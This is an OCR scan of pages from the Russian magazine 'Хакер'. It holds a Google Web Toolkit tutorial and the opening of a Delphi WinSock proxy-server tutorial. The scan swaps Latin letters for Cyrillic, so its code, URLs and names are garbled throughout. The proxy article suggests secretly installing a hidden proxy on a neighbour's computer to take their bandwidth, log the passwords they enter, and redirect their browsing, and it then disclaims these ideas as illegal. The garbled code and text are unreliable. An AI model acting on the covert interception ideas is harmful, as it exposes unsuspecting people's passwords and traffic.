оконного веб-интерфейса ктвоим услугам. Но и это еще не все — ѲѴѴТ умеет 
формировать изХМЕНіІрПедиезІ-объектов веб-запросы в формате 
ДаѵаЗсгірІ ОЬІесі Ыаііоп). Знаю, каковтвой следующий вопрос, и спешу 



► 104 



ХАКЕР 01 / 109 / 08 







^ согііпд 




дать на него ответ: ѲѴѴТ прекрасно уживается стакими серверными техно- 
логиями, как ЛЕ, Зргіпд, Зігиіз и ЕЛЗ. 

В ТЕБТОКІѴЕ 

До того какты озаботишься получением и установкой боодіе ѴѴеЬ Тооікіі, 
проверь наличие Л ѵа 5й К на твоем компе. Если по каким-либо (совершен- 
но непонятным для меня) причинам этот кит у тебя не установлен, сливай 
последнюю версию с сайта 5ип Місгозузіетз (адресты найдешь в боковом 
выносе). 

Сам же пакет 6ѴѴТ доступен для скачивания по адресу собе.доодіе.сот/ 
ѵѵеЫооІкіі/сІоѵѵпІоасІ.ЫтІ . На этой страницеты найдешь версии 6ѴѴТ для 
всех наиболее распространенных операционных систем: ѴѴІпбоѵѵз 2000/ХР, 
І_іпих и Мае 05 X. Инсталляционный пакет включает в себя ОѴѴТ-компи- 
лятор, браузер, предназначенный для отладки виджетов и пользователь- 
ских форм, библиотеку классов 6ѴѴТ плюс несколько демонстрационных 
примеров. 

В процессе установки ѲѴѴТ придется изрядно попотеть! Необходимо 
выполнить операцию, требующую недюжинных интеллектуальных усилий, 




Импорт ѲѴѴТ-проекта в ЮЕ Есіірзе 



сущность которой заключается в распаковке архива в один из каталогов 
жесткого диска. На этом установку ѲѴѴТ можно будет считать законченной. 
Для того чтобы убедиться в прямоте своих рук, можно запустить одно из 
приложений, выбрав его среди тех, что идут в комплекте с ѲѴѴТ в качестве 
примеров. Наиболее эффектная демонстрация возможностей фреймворка 
— веб-интерфейс клиента электронной почты. Для того чтобы впасть в 
нирвану от созерцания этого чуда, нужно в каталоге ѲѴѴТ зайти в подката- 
лог ват рІез/МаіІ и запустить на выполнение файл таіІ-зЬеІІ.стсІ. Пара 
секунд — иутебя на экране появятся два окна: окно ѲѴѴТ Оеѵеіортепі 
ЗЬеІІ, предназначенное для администрирования приложений, запускае- 
мых под управлением фреймворка, и окно с самим приложением. Ну как? 
Оценил? То-то и оно, боодіе веников не вяжет. Пора научиться управлять 
этой адской машинкой! 

Н АРХИТЕКТУРА ѲѴѴТ 

Фреймворк, к которому™ уже проникся определенной долей уважения, 
призван решить проблему переноса сіезкіор-приложений в веб-среду и 
включает в себя помимо набора виджетов массу других компонентов. Сюда 
входит собственный ХМ Ѳ- парсер, средства взаимодействия с серверными 
приложениями, средства интернационализации и инструменты конфигу- 
рирования создаваемых приложений. Посмотрев на рисунок, ты можешь 
получить примерное представление об архитектуре ѲѴѴТ. 

Думаю, что с первого взгляда на схематичное изображение архитектуры 
ѲѴѴТ ты понял, что ядром фреймворка является компилятор, генери- 
рующий ^ѵа5сгірІ-код. Вторым по значимости можно назвать модуль, 
реализующийудаленный вызов процедур — ПРО. Именноон отвечает 
за взаимодействие с серверной частью приложения. И длятого чтобы 
окончательноубедитьтебя втом, что это серьезная игрушка для реаль- 
ных проектов, хочу обратить твое внимание на модуль, обеспечивающий 
тесную интеграцию с ЛІпіІ (на всякий случай, как говорится, зресіаііог 
Ьедіппегв, напомню, что ЛІ появляется мощнейшим средством тестирова- 
ния Лѵа-приложений). 

И завершаетэту полную гармонии картину модуль ЛІ\ІІ — ЛѵаЗсгірІ Ыаііѵе 
Іпіегіасе. По его названию легко догадаться, что это и есть тот самый мос- 
тик между Лѵа и ЛѵаЗспрІ. 

0 ЗАГУГЛИСЬ НЕЖНО 

Пора испытать чудо-миелофон в действии! Сегодня мы остановимся на 
базовых концепциях работы ОѴѴТ. Так сказать, это будет наша матчасть. 

Для начала познакомимся с одним из скриптов, входящих в комплектѲѴѴТ. 



ХАКЕР 01 /109/ 08 



► 105 




^ согііпд 




Есіірзе с файлами ѲѴѴТ-проекта 







> \піо 

Существуют и другие 
АЭАХ-фреймворки, 
позволяющие гене- 
рировать ^ѵаБсгірІ- 
приложения с по- 
мощью «взрослых» 
языков программи- 
рования (РНР, РиЬу, 
Эаѵа). Прежде всего 
это АіахОпРаіІз. Что 
касается АЭАХ- 
фреймворков, 
основанных на Эаѵа, 
то здесь можно 
отметить такие 
решения, как ЕсНо, 
Оор, Ргоіоіуре. 



Назначение этих скриптов — сделать нашужизнь стольже лу- 
чезарной, какулыбка Юрия Гагарина. ѲѴѴТ-скрипты позволяют 
автоматически создавать разнообразные каркасы приложе- 
ний, на которые веб-разработчикуже наращивает мускулатуру 
в соответствии со своим замыслом. Этот каркас включает в 
себя необходимую структуру каталогов и файлы инициализа- 
ции приложения. 

Несмотря нато что фреймворк поставляется с несколькими 
скриптами, реальнотебе пригодится (по крайней мере на 
этапе освоения фреймворка) скриптаррІісабопСгеаіог. 

Для начала было бы неплохо создать каталогдля приложения, 
в который скрипт поместит результат своей работы. К примеру, 
пусть это будет каталог НеІІоѲѴѴТ. В корневом каталоге 6ѴѴТ 
есть файл аррІісаііопСгеаіог.стб. Запускай его через консоль 
со следующими параметрами: 

аррІісакіопСгеаког . стЬ -оик <путь к катало- 
гу проекта>\Не11оСШТ огд . паЬ . НеІІоСШТ . сіепк . 
НеІІоСЖ 1 

Здесь параметр оиі задает целевой каталог, в котором должны 
храниться создаваемые скриптом артефакты, а также опреде- 
ляет структуру Эаѵа- па кето в. Если теперь заглянуть в каталог, 
который еще мгновение назад был пуст, то в нем обнаружится 
определенная структура каталогов и скрипты для компиляции 
и запуска проекта. 

По доброте душевной программистов из боодіе созданный 
каркас — это уже полноценно работающее А^Х-приложение. 
Правда, не думаю, что его функциональности получится найти 
какое-то применение. В любом случае можешь полюбоваться 
на своетворение, открыв каталог приложения и запустив 
скрипт <бла-бла>-зЬеи.стб. 

Основу каркаса приложения составляет файл ЬеІоѲѴѴТд'аѵа , 
структуру которого ты можешьувидеть в любом редакторе кода 



с поддержкой Эаѵа-синтаксиса или в соответствующей врезке 
в статье (в сжатом виде). 

ШАБЛОН ОСНОВНОГО ФАЙЛА ОѴѴТ-ПРОЕКТА 

раскаде сот. расккриЬ . ЬеІІоСѴ/Т . сііепк ; 

ітрогк сот. доодіе . дѵ?к . соге . сііепк . ЕпкгуРоіпк ; 
ітрогк сот. доодіе . д мк . изег . сііепк .иі . Виккоп; 
ітрогк сот. доодіе . дмк . изег . сііепк . 
иі . СІіскЬізкепег; 

ітрогк сот. доодіе . дѵгк . изег . сііепк .иі .ЬаЬеІ ; 
ітрогк сот. доодіе . дѵгк . изег . сііепк . 
иі . КоокРапеІ ; 

ітрогк сот. доодіе . дмк . изег . сііепк . иі .Місідек ; 

риЫіс сіазз ЬеІІоСЖ 1 ітріетепкз ЕпкгуРоіпк { 
риЫіс ѵоіЬ опМосІиІеЬоасІ ( ) { 
кіпаі Виккоп Ьиккоп = пем Виккоп 
( " Сііск те" ) ; 

кіпаі ЬаЬеІ ІаЬеІ = пеѵ ЬаЬеІ () ; 

Ьиккоп . аскіСІіскЬізкепег (пем 
СІіскЬізкепег ( ) { 

риЫіс ѵоісі опСІіск (ШіЬдек зепЬег) { 
ік ( ІаЪеІ . декТехк ( ) . едиаіз ( " " ) ) 

ІаЬеІ . зекТехк ( "Неііо ѴУог ІсЗ. I " ) ; 

еізе 

ІаЬеІ . зекТехк ( " " ) ; 

} 

})! 

КоокРапеІ . дек ( " зіокі " ) . асЫ (Ьиккоп) ; 
КоокРапеІ . дек ( " з1ок2 " ) . асЫ ( ІаЬеІ ) ; 

} 
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еѵѵт Оеѵеіортепі; БИеІІ 



Другой важный файл проекта — ЬеІІобѴѴТ.дѵѵЕхтІ. Он содер- 
жит информацию, необходимую ѲѴѴТ для конфигурирования 
нашего проекта, и имеет достаточно простую структуру. 

<тосіи1е> 

<! — ІгхЬегік Д]те соге У7еЪ ТооІкіО зкибі: . --> 

сіпТіегікз пате= ' сот. доодіе . дѵгк . изег . 1Цзег ' /> 

<! — Зресібу кЪ.е арр епкгу роіпк с1азз.--> 

<епкгу-роіпк с1азз= ' сот. расккриЪ . ЪеІІоСЖ 1 . 
сііепк . кеІІоСШТ ' /> 

</тос!и1е> 

В этом файле тэг іпЬегкз определяет модули, от которых 
создаваемое приложение будет наследовать структуру 
и внешние интерфейсы. В этом случае мы наследуем 



только функциональность, определяемую модулем ІІзег, 
который входит в библиотеку модулей 6ѴѴТ. В реальных 
проектахтебе понадобится организовать наследование и 
от многих других модулей (какие именно модули входят в 
состав ѲѴѴТ, а также их назначение смотри в документации 
— не маленький уже). Тэг ЕпІгуРоіпІ указывает на класс, 
экземпляр которого будет создаваться в момент загрузки 
модуля фреймворком. Название этого класса, какты уже, 
наверное, заметил, мы указывали в качестве параметра 
команды аррИсаІіопСгеаІог во время создания шаблона 
будущего приложения. 

Н ВОПРОСЫ ИНТЕГРАЦИИ 

Пора нарастить на голый ѲѴѴТ-скелет немного мяса :). 
Будем действовать поэтапно. Можешь запускать свою лю- 
бимую ^ѵа ЮЕ или открывать многострадальный Ыоіераб 
(если ты сторонник минимализма и нетрадиционного 
секса). Если ты все-таки решил использовать одну из сред 
^ѵа-разработки, для начала было бы неплохо из шаблона 
нашего приложения сформировать проект, который можно 



Классы из пакета заѵа.ьамс.*, доступные из ЗѴѴТ 


ВООЬЕАЫ 


Вуте 


СНАВАСТЕВ 


СІ.А55 


Ооііві_е 


Ею АТ 


ІМТЕ0ЕВ 


Бочо 


Матн 


ІМцмвев 


ОВ.1ЕСТ 


Бновт 


Бтвшѳ 


ЗтвшеВуррЕВ 


Бузтем 


ТНВОѴѴАВІ.Е 






Исключения 


АззевтіоиЕввов 


АввауБтовеЕхсертіоы 


СьаззСазтЕхсертіом 


Ехсертіом 


Еввов 


Іі_і_ЕеАі_АвеіімЕмтЕхсЕРТіом 


ІІ_І.ЕеАІ_5ТАТЕЕхСРЕТІ0М 


ІмоЕхОитОрВоимозЕхсЕРТіоы 


МЕеАТІѴЕАвВАУ5і2ЕЕхСЕРТІ0М 


Мш_і-РоштевЕхсертіом 


МиМВЕВрОВМАТЕхСЕРТІОИ 


РілмтімеЕхсертіом 


ЗтвшеІмвЕхОіяОрВоішвзЕхсЕРТіом 


УмЗУРРОВТАВЕІ-ОрЕВАТІОНЕхСЕРТІОН 




Интерфейсы 


СнавБесшемсе 


СЮЫЕАВЬЕ 


СОМРАВАВЬЕ 




]аѵа.5цп.сот/]аѵа5е/ 
боѵѵпіабв — отсюда 
сливай ^ѵа 5БК. 
собе.доодіе.сот/ 
ѵѵеЫооІкіІ: — по этому 
адресу находится 
домашняя страница 
проекта ѲѴѴТ, на 
которой можно найти 
нетолько сам фрейм- 
ворк, но и разнооб- 
разную документацию 
к нему. 

доодІеѵѵеЫооІкіЕ 
Ыодзроксот — у 
проекта боодіе ѴѴеЬ 
Тооікіі: есть свой блог, 
из которого можно 
узнать много интерес- 
ных подробностей о 
развитии проекта. 
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загрузить в эту ЮЕ. В настоящее время реализован импорт шаблона 
только в ЮЕ Есіірзе, так что если ты, как и я, являешься сторонником 
ЫеіВеапз, то тебе придется сначала сформировать проект для Есіірзе, 
а затем импортировать е го в ЫеіВеапз с помощью специально го 
плагина. 

Во-первых, нужно создать файлы проекта, необходимые для Есіірзе ЮЕ. 
Вводи в консоль следующую команду: 

ргоз есССгеаСог . стсі -оиС <путь к каталогу проекта> - 
есіірзе НеіІоСНТ 

Скрипт ргоіесЮгеаІог, в отличие отаррІісабопСгеаІюг, позволяет создать не 
просто АбАХ- приложение, а проект для ЮЕ Есіірзе. 

Пока у нас есть всего лишь пустой проект. Теперь необходимо его напол- 
нить файлами шаблона приложения. Запускайужезнакомыйтебескрипт 
аррІісайопСгеаІог: 

арріісаЫопСгеаСог . стсі -оиС <путь к каталогу проекта> 
-есіірзе НеіІоСШТ -оѵегшгібе пате . ЬаіЬогосііп . 1іе11одѵ\Щ . 
сііепС . НеІіоСШТ 



Интеграция с ЛІпіІ: 

Для интеграции СѴѴТ-приложения с Лбпп и создания тестов достаточ- 
но просто сделать так, чтобы создаваемый класс расширял ТезЫазе. 
Класс также должен иметь метод ^егМосМеИатеО, за которым могут 
следовать сами тесты. Например: 

риЫіс сіазз МаСЬТезС ехСепсІз СШТТезССазе{ 
риЫіс ЗСгіпд деСМосбЫеЫате ( ) { 
геСигп "огд. сотр. арр" ; 

} 

риЫіс ѵоісі СезРАЬзоіиРеѴаІие ( ) { 
іпС аЬзѴаі = МаСІі . аЬз ( -5 ) ; 
аззегШдиаіз ( 5 , аЬзѴаі); 

} 

} 



Теперь можно забыть про неуютную консоль (ну конечно, я в курсе, что для 
тебя консоль — дом родной, так что этот пассаж я отношу исключительно на 
свой счет :)) и перейти к разработке с помощью Есіірзе. Для этого выбирай 
в главном меню пункт«Файл -> Импорт» и указывай в стандартном диалоге 
путь к каталогу с файлами проекта. 

Кстати говоря, скрипт ргоіесЮгеаФг имеет и другие ключи запуска, помо- 
гающие при создании 6ѴѴТ- проектов. Среди них имеются: 

'-апЕ — генерируетбилд-файл для самого популярного сборщика баѵа- 
проектов; 

'-есіірзе' — уже знакомый ключ, формирующий проект для ЮЕ Есіірзе; 

'-оиЕ — служит для спецификации директории проекта; 

'-оѵегѵѵгііе' — позволяет повторно создать структуру проекта, перезаписав 
уже существующие файлы; 

'-ідпоге' — используется также, как и предыдущий, при повторном постро- 
ении проекта, стой лишь разницей, что существующие файлы не перепи- 
сываются, а просто игнорируются. 

Н КОГДА ПРИХОДИТ ВРЕМЯ ДЕЙСТВОВАТЬ 

Знакомство с базовыми принципами фреймворка 6ѴѴТ было бы неполным 
без обсуждения такого важного вопроса, как находящиеся в распоряже- 
нии разработчика способы запуска приложений. Начнем стех, что имеют 
отношение к НозіебМобе, то есть к локальному запуску. 

Во-первых, через консоль можно запустить на выполнение специаль- 
ный стб’шник. В каталоге любого ѲѴѴТ- проекта всегда присутствует 
файл вида <имя_проекта>-зНеІІ.стб, инициализирующий рабочую 



13№ 

баѵаЗсгірі; Иаі:іѵе ІШегіасе (63М) позволяет легко осуществлять вызов 
как объектов баѵаЗсгірі: из баѵа-классов, так и наоборот. Это возможно 
благодаря СѴѴТ-компилятору, который может интегрировать в чистый 
баѵаЗсгіріжод фрагменты кода, сгенерированные баѵа-классами. Ниже 
представлен пример такой интеграции. 

риЫіс паСіѵе іпС асІсІТѵгоКитЪегз ( іпС х, іпС у) 

/*-{ 

ѵаг гезиЫ = х + у; 
геСигп гезиЫ; 

}-*/; 
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среду фреймворка и разворачивающий в ней приложение. Во-вторых, 
если это проект для ЮЕ Есіірзе, то в проводнике проектов, раскрыв дерево 
любого из импортированных ѲѴѴТ-проектов, среди прочих файлов нельзя 
не заметить тотже скриптовый файл. Что с ним делать, ты уже знаешь. 

И наконец, в-третьих, как и любой другой проект Есіірзе, 6ѴѴТ-приложение 
можно запустить из ЮЕ с помощью стандартной команды Пип. 

Хочешь спросить, а какже суже готовым проектом? Какего опубликовать 
на сервере и запустить в серверном режиме, а не в НозіесІМосІе? Вспомни 
о ключах, влияющих на сборку проекта. Как ты думаешь, зачем там предус- 
мотрен вариантапі-сборки? Именно для возможности автоматического 
развертывания. Нуа еслитебе необходимо обойтись без апі-скриптов, 
та кое тоже возможно. 

Сначала нужно скомпилировать проект. В процессе компиляции будут 
созданы файлы ЗаѵаЗсгірІ. Ты наверняка уже давно заметил, что в ката- 
логе проекта присутствует скрипт <имя_проекта>-сотріІе.стсІ. Его за- 
пуск без каких-либо параметров выполнит компиляцию всего проекта. В 
результате в каталоге проекта среди файлов и каталогов появится новый 
каталог — ѵѵѵѵѵѵ, содержащий файловую структуру веб-приложения. В 
нем находится все, что необходимо для публикации проекта на сервере. 
Основным файлом проекта будет файл <имя_проекта> с расширением 
Ыті. Теперь можно просто скопировать содержимое каталога ѵѵѵѵѵѵ в 



соответствующую директорию веб-сервера и наслаждаться работой 
своего крутейшего, не к ночи будет сказано, приложения ѴѴеЬ 2.0. Просто 
и со вкусом. Согласен? 

Н ТО ВЕ ССЖТІЫІІЕО? 

Ну что, гшап, пора заканчивать наше первое знакомство с мега на ворочен- 
ным фреймворком от одного симпатичного мне поисковика. Каквидишь, 
мы не написали ни одной строчки кода и не создали (возможно, вопреки 
твоим ожиданиям) ни одной ацкой проги. Связано это стем, что, прежде 
чем садиться за руль гоночного болида, не мешало бы предварительно вы- 
яснить, где у него педаль тормоза. Именно этим мы сегодня с тобой и зани- 
мались — избавлялись, так сказать, от страха первого свидания, снимали 
внутренниезажимы и комплексы :]. Еслитема создания веб-приложений 
с помощью 6ѴѴТ тебя серьезно вставила, то мы обязательно ее продолжим 
и в следующий раз немного похулиганим на просторах необъятной Сети, 
написав что-нибудь эдакое, СѴѴТ-ориентированное. Самое главное — изъ- 
яви свою демократическую волю мне или редактору рубрики с помощью 
электронной почты. 

И, конечноже, ничто не мешаеттебе слить все доки с веб-ресурса проекта 
6ѴѴТ и продолжить свое дальнейшее развитие именно втом направлении, 
котороетебя особенно интересует, □с 



Почтовый клиент, построенный на ван 




Заготовка 6ѴѴТ- приложения демонстрирует возможности 
технологии АЧАХ 
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ПРОГРАММИРУЕМ РЕАЛЬНОЕ ЗЛО ДЛЯ ЛОКАЛЬНОЙ СЕТИ 



ІМы много раз рассказывали тебе про прокси-серверы: для чего они нужны, как они рабо-| 



гѵ 



гают и чем полезны хакеру. Тем не менее знать и использовать — это одно, а вот создавать 



Ісамому — совсем другое дело. Этот творческий труд полезен для души, тела и, конечно 



| В НЕМНОГО ТЕОРИИ 

Итак, прокси-сервер — это прежде всего программа, выступающая пос- 
редником между клиентом и сервером. Все привыкли связывать понятие 
прокси только с протоколом НТТР. На самом деле существуют проксики и 
| для других протоколов, о которых я расскажу чуть позже. Самый распро- 
страненный вид проксиков — НТТР. При работе через НТТР-прокситвой 
браузер не будет соединяться с сервером, на котором расположен запра- 
шиваемый сайт, он соединится с прокси и передастему запрос. Получив 
от тебя все необходимые данные, прокси к сам сконнектится с удаленным 
I ѵѵеЬ-сервером и отправиттвой запрос. После его обработки ѵѵеЬ-сервер 
вернет документ проксику, который затем отправитеготебе. Такие проксики 
полезны, когда нужна анонимность (поскольку они бывают прозрачными) 
или если твой провайдер ограничивает тебя и не разрешает посещать сай- 
I ты, расположенные на забугорных серверах. Еще одно место, где постоянно 
используются прокси-серверы, — корпоративные (домашние) локальные 
сети. Для предоставления сотрудникам компании доступа в инет админы 
| устанавливают на шлюзе проксик, и вся контора ходит через него в Сеть. 
Плюсы такого способа очевидны: можно легко отслеживать маршруты 
пользователей, считать количество израсходованного трафика и быть 
I уверенным втом, что юзеры не будут пользоваться лишним софтом, так как 
не каждая программка способна работать через НТТР-прокси. 

Я уже говорил, что НТТР-прокси не является единственнымтипом прокси- 
серверов. В природе также встречаются: 



1 . НТТР5 ргоху — один из самых универсальных типов прокси-серверов. В 
нем реализована поддержка спецификации протокола НТТР 1.1. Особен- 
ность этой версии протокола — поддержка метода СОЫЫЕСТ, благодаря 
которому становится возможным работать с НТТР5 (безопасным НТТР), 

а также заставить работать через прокси-сервер программы вроде 100, 
функционирование которых через НТТР-прокси невозможно. 

2. РТР ргоху — довольно редкий вид, занесенный в Красную книгу. Каки 
следует из названия, эти прокси предназначены для работы с ЕТР-протоко- 
лом. Главная их особенность — возможность работы как в пассивном, так и 

в активном режимах. 

З.Зоскв ргоху — самый продвинутый тип проксиков. Такие прокси-серверы 
работаютс любым ТСР/ІР-протоколом (Кр, рорЗ, вгтйр, ппір ит.д.). 

Е ЗАЧЕМ ПИСАТЬ СВОЙ ПРОКСИ-СЕРВЕР 

Разобравшись на практике с основами написания прокси-серверов, ты 
сможешь пополнить коллекцию ][-тулз собственного изготовления. На- 
пример, можно без труда сделать прокси абсолютно невидимым в системе. 
Подсунув такую штуку соседу, в случае если он не думает о веси гТу и не 
юзает файрвол, хакер без проблем сможет гонять инет-трафик через его 
комп, наслаждаясь халявой. Другим интересным способом применения 
твоего шедевра можетбытьснифание хакером паролей, которые сосед 
вводит в своем браузере. В этом случае хакерутакже нужно будет подкинуть 
несчастному соседутвою тулзу и убедить его запустить ее. После запуска 
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Форма будущей программы 

][-проксикавтоматически сконфигурирует бродил ку соседа на работу через 
самого себя. Тем самым чел будетспокойно бороздить инет, а все его запро- 
сы (отправка паролей и т.д.) будутзаписываться лог. Круто? Несомненно! 

Но мы-то стобой знаем, что все эти бредовые идеи носят противозаконный 
характер, поэтому мы будем писать прокси-сервер лишь в образовательных 
целях, даже и не думая о получении выгоды. 

г ИСПОЛЬЗУЕМЫЕ ТЕХНОЛОГИИ 

При написании серверных сетевых приложений не рекомендуется 
использовать компонентную модель ОеІрЫ. Компоненты не обладаюттой 
гибкостью, которую можно получить, применяя АРІ. Поэтому сегодня нам 
опять предстоит столкнуться со страшным ѴѴІпЗоск АРІ. 

Теперь давай обсудим алгоритм работы нашего будущего прокси-сер- 
вера. Поскольку мы будем создавать серверное приложение, ему просто 
необходимо быть многопользовательским. Ты только представь корпора- 
тивный прокси-сервер, которым может пользоваться только один человек, 
а остальныетем временем будут нервно курить в стороне. Итак, раз наше 
приложение будет многопользовательским, то оптимально использовать 
потоки. При подключении клиента для него будет создаваться отдельный 
поток. Таким образом наш сервер сможет одновременно работать с не- 
сколькими пользователями. 

После установки соединения с клиентом — браузером пользователя 
— первое, что нам необходимо будет сделать, — это получить запрос кли- 
ента. Получив запрос и вытащив из него адрес удаленного сервера, надо 
сразу попытаться соединиться с ним, передать полученный ранее запрос, 
дождаться ответа и переслать полученный ответ обратно клиенту. Если ты 
внимательно слушал теорию, то могзаметить, что в качествеудаленного 
сервера не обязательно должен выступать ѵѵеЬ-сервер. На его месте впол- 
не можетбыть и другой проксик. Таким образом, можно создать настоящую 
цепочку проксиков, что, несомненно, повыситанонимность. 

Обсудим получение запроса от клиента. В запросе, который формирует 
браузер, содержится информация, на основании которой ѵѵеЬ-сервер мо- 
жет определить, какой именно ѵѵеЬ-документ мы отнего хотим. Все нюансы 
запросов™ можешьузнать из ВЕС 2068. Рассмотрим пример. Когда ты 
набираешь в браузере ѵѵѵѵѵѵ.хакер.ги . запрос имеет следующий вид (может 
отличаться, зависит отбраузера): 

СЕТ Ьккр : / /хакер . ги/ НТТР/ 1 . О 

ІІзег-Адепк : Орега/9.21 (Мпскжз КГТ 5.1; II; ги) 

Нозк: хакер. ги 

Ассерк : кехк/іікті, арріісакіоп/хті ; д=0 . 9 , арріісакіоп/ 

хЬктІ +хт1 , 

ітаде/рпд, ітаде/зред, ітаде/дік, ітаде/х-хЪіктар , 



*/*; 4 = 0,1 

Ассерк -Ьапдиаде : ги-КТЦ, ги; д=0 . 9 , еп; д=0 . 8 
Ассерк-Скагзек : ізо-8859-1, икк-8, икк-16 

Как видишь, в запросе содержится много полезной и бесполезной 
информации, но самое главное — это первая и третья строчка. В первой 
определен адрес, который запросил пользователь, а во второй — хост. 
Получив этот запрос, наш проксикдолжен извлечь адрес хоста, определить 
его ІР, соединиться и послатьему весьзапрос. Наверняка утебя возник 
вопрос: можно ли изменить этот запрос? Отвечаю. Конечно можно! Мы 
легко сможем поиздеваться над пользователем, и вместо ѵѵѵѵѵѵ.уап б ех.ги он 
будет попадать на ѵѵѵѵѵѵ.ххх-рогпо.сот. 

0 НЕОБХОДИМЫЕ ФУНКЦИИ 

Как и подобает в программировании, после обсуждения алгоритма реше- 
ния поставленной задачи, нужно определиться с инструментами, которые 
будут необходимы для этого. В нашем случае главным молотком будет 
ОеІрЫ, а гвоздями с шурупами — ѴѴІпЗоск АРІ и классы ТТЬгеаб. Рассмот- 
рим необходимые ѴѴіпЗоск АРІ функции. 

іипскіоп МЗАЗкагкир (мѴегзіопКедиезкесІ: ѵгогсі; 
ѵаг МЗАБака : ТѴ/ЗАБака) :іпкедег; зксісаіі; 

Эта функция, с вызова которой нужно начинать программирование любого 
сетевого приложения. Она предназначена для инициализации сетевой 
библиотеки ѴѴІпбоѵѵз. Функции необходимо заслать два параметра: 

1. ѵѵѴегБІопРериеБІеб — версия инициализируемой библиотеки. Их всего 
две: 1.1 и 2.0. Например, для первой версии пишем: такеѵѵогсНі ,1). 

2. Указатель на структуру ѴѴЗАйаІа. После выполнения функции в эту струк- 
туру запишется информация о сетевой библиотеке. 

Приуспешном выполнении функция вернетО. Для получения кодов ошибок 
в ѴѴІпЗоск АРІ служит функция ѴѴЗАѲеІказіЕггогО. Ей не нужно передавать 
какие-либо параметры, после вызова она возвращает код последней воз- 
никшей при работе с сетевыми функциями ошибки. 

кипскіоп зоскек (ак: іпкедег; куре : іпкедег ; 
ргокосоі : іпкедег ) :Т8оскек, зксісаіі; 

Перед тем каксоединиться судаленным узлом, нужно создать «розетку» 

— зоскек Как разза его создание и отвечает одноименная функция зоскек 
Входных параметровтри: 

1. аі — семейство протоколов. Нам потребуется лишьТСР, поэтомубудем 
указы вать АЕ_І N ЕТ. 

2. к/ре — тип создаваемого сокета. Может быть бос к_5Ігеат (для протокола 
ТСР/ІР) и 50ск_бдгат (ибр). 

3. ргокосоі — протокол. Для ТСР нужно указать ІРРРОТО_ТСР. 

Результатом выполнения будет новый сокет. Создав сокет, можно пробовать 
подключаться. Для этого в библиотеке реализована функция Соппеск 

ипскіоп Соппеск (8:Т8оскек; ѵаг паше : ТЗоскАсМг; 
пашеіеп : іпкедег) : Іпкедег : зксісаіі ; 

Параметрами для функции служат: 

1.5 — зоскеі, созданный функцией зоскек 

2. пате — структура ЗоскАббг, содержащая данные, необходимые для 
подключения (протокол, адресудаленного компьютера, порт). 

3. патеіеп — размер структуры типа ТЗоскАббг. 

Успешно выполнившись, а значит, и установив соединение, функция вер- 
нетО, в противном случае — ошибку, которую можно получить с помощью 
ѴѴЗАѲеІказіЕггогО. 

Структура ТЗоскАббг выглядиттак: 

ТЗоскАскігШ = зоскаскіг_іп; 

5оскАскіг_іп = гесогсі 

зіп_каті1у: и_зкюгк; // семейство протоколов 
зіп_рогк: и_зкюгк ; // порт, с которым нужно будет 
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установить соединение 

8Іп_асМг: ТІпАсИг; // структура, в которой записана 
информация об адресе удаленного компьютера 

зіп_зего: аггау[0. .7] об СЬаг; //совмещение по длине 
структуры зоскаббг_іп с зоскаббг и наоборот 
епб; 

Чтение и отправка данныхудаленной стороне осуществляется с помощью 
функций вепсі и гесѵ. Они описаны следующим образом: 

бипсбіоп зепб (з:ТЗоскеб, ѵаг Виб; Іеп : іпбедег ; 
біадз : іпбедег ) : Іпбедег; збсісаіі ; 

бипсбіоп гесѵ (з:Т8оскеб, ѵаг Виб; Іеп: іпкедег ; 
біадз : іпбедег) : Іпбедег; збсісаіі; 

Параметры для обеих функций одинаковые: 

1.5 — сокет, на который нужно отправить (принять) данные. 

2. ЫЛ — буфер с данными для отправки (приема). 

З.іеп — размер передаваемых (принимаемых) данных. 

4Ладз — флаги, отвечающиеза метод отправки (приема). 

Выполнившись, функция вернет фактическое количество отправленных/ 
принятых байт. 

бипсбіоп Ъіпсі ( 3 : ТВоскеб ; ѵаг аскіг : ТЗоскАсМг ; пашеіеп: 
Іпбедег ) : іпбедег ; збсісаіі; 

Назначение функции — связывание структуры ТЗоскАббг с созданным 
сокетом. Параметров три: сокет, структура, размер структуры. 

бипсбіоп Іізбеп (з:ТЗоскеб; Ьаскіод : Іпбедег ) : Іпбедег ; 
збсісаіі ; 

Фактическое прослушивание порта начинается после вызова этой 
функции. Для работы функции требуется всего два параметра: сокет и 
максимальное количество запросов на ожидания подключения. 

бипсбіоп СІозеЗоскеб ( з : ТЗоскеб ) : іпбедег ; збсісаіі ; 

Эта функция закрывает сокет. Параметр всего один — сокет, который нужно 
закрыть. 

бипсбіоп Зеіесб (пбсіз : Іпбедег , геасібсіз , ѵпгібебсіз, 
ехсерббсіз: РЕБЗеб , бітеоиб: РТітеѴаІ ) : Ьіпдіпб ; збсісаіі; 



Цельфункции — проверка готовности сокета (чтение, записьсрочных 
данных). Зеіесі очень пригождается, когда требуется разрабатывать мно- 
гопользовательские сетевые приложения подобно нашему, где исполь- 
зование событийной модели ѴѴІп б о\А/5 не оправдывает себя. В качестве 
параметров функция принимает: 

1. пісіз — параметр игнорируется и присутствует л ишь для совместимости с 
моделью сокетов Беркли. 

2. геаФсіз, ѵѵгііеісіз, ехсерйбз — они определяют возможность чтения, 
записи и фактприбытия срочных данных. Эти три параметра являются ука- 
зателями на структуру Р0_5ЕТ, которая представляет собой набор сокетов. 

3. ТІтеОиі — указатель на структуру іітеѵаі. В структуре определено макси- 
мальное время ожидания. Для установки бесконечного ожидания следует 
передать в этот параметр піі. 

ргосебиге ЕБ_2ЕКО (ѵаг ЕБЗеб : ТЕБЗеб) ; 

Очистка и инициализация набора сокетов. Перед добавлением сокетов в 
набор необходимо его п рои ни диализировать с помощью этой функции. 

ЕБ_ЗЕТ ( Зоскеб : ТЗоскеб; ѵаг ЕБЗеб : ТЕБЗеб) ; 

Процедура предназначена для добавления сокета, переданного в первом 
параметре в набор, указанный во втором. 

бипсбіоп ЕБ_ІЗЗЕТ ( Зоскеб : ТЗоскеб; ѵаг ЕБЗеб: ТЕБЗеб): 
Вооіеап; 

Функция позволяет проверить вхождение сокета (первый параметр) в 
набор (второй параметр). 

г кодим 

Вот и настала та заветная минута, когда мы заканчиваем разбираться сте- 
орией и приступаем к реальному кодингу. Запускай йеІрЫ, создавай новый 
проекти придавай форме вид, похожий на вид моей формы. 

Мы не будем ничего скрывать от пользователя, поскольку, если ты пом- 
нишь, мы пишем программу в образовательных целях. Ты там дальше сам 
разберешься. На форме у меня три кнопки: 

1 . «Запустить» — запускает проксик на порту 8080. 

2. Сопбдиге ІЕ — для автоматического конфигурирование браузера ІЕ. 

3. СопЕдиге Орега — тожесамое конфигурирование, только для Орега. 

